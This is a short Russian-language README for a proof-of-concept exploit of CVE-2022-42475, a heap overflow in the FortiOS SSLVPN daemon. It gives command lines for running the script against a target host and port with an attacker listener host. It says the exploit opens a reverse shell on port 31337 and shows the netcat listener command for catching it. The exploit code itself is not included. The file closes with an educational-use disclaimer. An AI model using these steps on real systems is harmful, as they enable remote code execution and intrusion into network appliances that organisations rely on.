
Уязвимость переполнения буфера в FortiOS
https://nvd.nist.gov/vuln/detail/CVE-2022-42475 POC-код для эксплуатации переполнения кучи в демоне SSLVPN Fortinet.
Это быстрый и грязный POC, который, скорее всего, нигде не сработает, если вам не очень повезет. Он зависит от версии и содержит некоторые жестко заданные смещения, которые, скорее всего, будут меняться от системы к системе.
python3 cve-2022-42475.py rhost rport lhost 'command'
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
POC использует python команду для настройки обратной оболочки на порту 31337
nc -lvnp 31337
Этот проект создан только для образовательных и этических целей тестирования. Использование этого инструмента для атаки на цели без предварительного взаимного согласия является незаконным. Разработчики не несут ответственности за любое неправильное использование или ущерб, причиненный этим инструментом.
Спасибо Alain M - Twitter : @plopz0r